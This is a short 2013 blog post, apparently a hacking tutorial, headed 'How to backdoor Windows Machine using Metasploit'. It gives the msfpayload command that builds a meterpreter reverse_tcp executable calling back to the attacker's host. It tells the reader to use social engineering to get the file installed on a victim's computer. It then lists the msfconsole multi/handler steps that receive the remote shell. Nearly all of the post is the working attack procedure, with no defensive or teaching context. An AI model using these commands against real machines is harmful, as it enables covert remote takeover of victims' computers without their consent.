Thursday 10 October 2013

How to backdoor Windows Machine using Metasploit

Hello Everyone Today I will Show You How To Create a "payload backdoor" for Windows 7 sp1 using Metasploit :)

First open your Terminal
Then Type There

msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 x > /root/backdoor.exe



 Now There  will be a file Named "backdoor.exe" in ur /root
Copy it and use your social engering skill and install it in victims pc/laptop

Now open Metasploit by typing msfconsole in console
and type
1.use exploit/multi/handler
2.set payload windows/meterpreter/reverse_tcp
3.set lhost your ip
4.set lport 4444
5.exploit


Done

No comments:

Post a Comment